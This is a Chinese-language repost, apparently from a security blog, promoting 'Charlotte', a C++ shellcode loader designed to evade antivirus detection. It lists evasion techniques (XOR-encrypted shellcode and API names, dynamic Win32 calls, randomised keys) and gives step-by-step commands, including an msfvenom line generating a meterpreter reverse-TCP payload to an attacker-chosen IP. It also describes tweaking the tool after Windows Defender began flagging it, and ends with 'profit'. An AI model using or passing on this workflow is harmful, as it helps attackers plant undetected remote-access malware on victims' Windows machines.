免杀 0/26 Charlotte C++ Shellcode 加载器

admin 2021年10月1日21:16:25评论291 views字数 653阅读2分10秒阅读模式


免杀 0/26 Charlotte C++ Shellcode 加载器


免杀 0/26 Charlotte C++ Shellcode 加载器


2021年5月13日:


  1. c ++ shellcode启动器,截至2021年5月13日完全未检测到0/26。

  2. 动态调用win32 api函数

  3. Shellcode和函数名称的XOR加密

  4. 每次运行随机XOR键和变量

  5. 在Kali Linux上,只需“ apt-get install mingw-w64 *”就可以了!


2021年5月17日:


    1.随机字符串长度和XOR键长度


免杀 0/26 Charlotte C++ Shellcode 加载器


用法


        git克隆存储库,使用beacon.bin命名生成您的shellcode文件,然后运行charlotte.py

例子:


  1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*

  2. cd charlotte

  3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin

  4. python charlotte.py

  5. profit


更新v1.1

2021/05/21:

显然,Microsoft Windows Defender能够检测到.DLL二进制文件,以及他们如何标记它?通过寻找几个16字节大小的XOR键将其更改为以下POC .gif中显示的9表示现在再次未被检测到。


项目地址:

https://github.com/9emin1/charlotte

本文始发于微信公众号(Khan安全攻防实验室):免杀 0/26 Charlotte C++ Shellcode 加载器

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月1日21:16:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   免杀 0/26 Charlotte C++ Shellcode 加载器http://cn-sec.com/archives/380015.html

发表评论

匿名网友 填写信息